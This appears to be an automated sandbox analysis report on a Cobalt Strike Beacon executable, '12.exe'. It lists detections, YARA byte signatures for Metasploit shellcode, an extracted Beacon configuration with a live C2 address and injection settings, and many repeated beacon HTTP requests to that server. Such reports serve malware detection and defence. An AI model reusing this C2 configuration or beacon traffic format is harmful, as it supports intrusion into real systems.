
Windows Analysis Report
12.exe

Overview

General Information

Sample name: 12.exe
Analysis ID: 1581039
MD5: c8c40c038a4a8541e0924520599d8c28
SHA1: 295bb62eaf5f53f55d60f2f339a45cd7cd7aa82c
SHA256: cbc52ae56076b1e28cff760b662145425620ae4b6d400cc9446deec21d1aae4a
Tags: CobaltStrike, exe, user-sicehicetf

Detection

CobaltStrike, ReflectiveLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Powershell download and execute
Yara detected ReflectiveLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 12.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\12.exe" MD5: C8C40C038A4A8541E0924520599D8C28)
  • cleanup
Name: Cobalt Strike, CobaltStrike

Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.

Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella

Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
Malware configuration (CobaltStrike):

{
  "BeaconType": ["HTTP"],
  "Port": 59060,
  "SleepTime": 60000,
  "MaxGetSize": 1048576,
  "Jitter": 0,
  "C2Server": "152.42.226.16,/cx",
  "HttpPostUri": "/submit.php",
  "Malleable_C2_Instructions": [],
  "HttpGet_Verb": "GET",
  "HttpPost_Verb": "POST",
  "HttpPostChunk": 0,
  "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
  "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe",
  "CryptoScheme": 0,
  "Proxy_Behavior": "Use IE settings",
  "Watermark": 987654321,
  "bStageCleanup": "False",
  "bCFGCaution": "False",
  "KillDate": 0,
  "bProcInject_StartRWX": "True",
  "bProcInject_UseRWX": "True",
  "bProcInject_MinAllocSize": 0,
  "ProcInject_PrependAppend_x86": "Empty",
  "ProcInject_PrependAppend_x64": "Empty",
  "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"],
  "ProcInject_AllocationMethod": "VirtualAllocEx",
  "bUsesCookies": "True",
  "HostHeader": ""
}
Source | Rule | Description | Author | Strings
12.exe | JoeSecurity_CobaltStrike_4 | Yara detected CobaltStrike | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leveraged by metasploit shellcode | unknown
  • 0x8f:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0xfb:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security
00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
(33 entries in total; only the first five are shown)

Source | Rule | Description | Author | Strings
0.2.12.exe.400000.0.unpack | JoeSecurity_CobaltStrike_4 | Yara detected CobaltStrike | Joe Security
0.0.12.exe.400000.0.unpack | JoeSecurity_CobaltStrike_4 | Yara detected CobaltStrike | Joe Security
0.2.12.exe.db0000.2.raw.unpack | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security
0.2.12.exe.db0000.2.raw.unpack | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
0.2.12.exe.db0000.2.raw.unpack | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
(53 entries in total; only the first five are shown)

No Sigma rule has matched
Suricata IDS alerts: Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol


                    AV Detection

Source: 12.exe | Avira: detected
Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: CobaltStrike (configuration as listed above)
Source: 12.exe | ReversingLabs: Detection: 94%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 12.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DBEF82 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00DBEF82
Source: 12.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DBA70E _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_00DBA70E
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DB5225 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00DB5225

                    Networking

Source: Network traffic | Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49730 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49735 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49737 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49743 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49750 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49752 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49745 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49753 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49755 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49754 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49741 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49746 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49734 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49747 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49751 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49732 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49764 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49748 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49770 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49733 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49776 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49758 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49749 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49782 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49788 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49794 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49805 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49811 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49817 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49823 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49829 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49839 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49846 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49852 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49858 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49869 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49881 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49887 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49904 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49875 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49916 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49896 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49925 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49933 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49939 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49910 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49945 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49954 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49962 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49968 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49973 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49978 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49987 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49994 -> 152.42.226.16:59060
                    Source: Malware configuration extractor | URLs: 152.42.226.16
                    Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 59060
                    Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 152.42.226.16:59060
                    Source: Joe Sandbox View | ASN Name: NCRENUS NCRENUS
                    Source: global traffic | HTTP traffic detected:
                    GET /cx HTTP/1.1
                    Accept: */*
                    Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                    Host: 152.42.226.16:59060
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
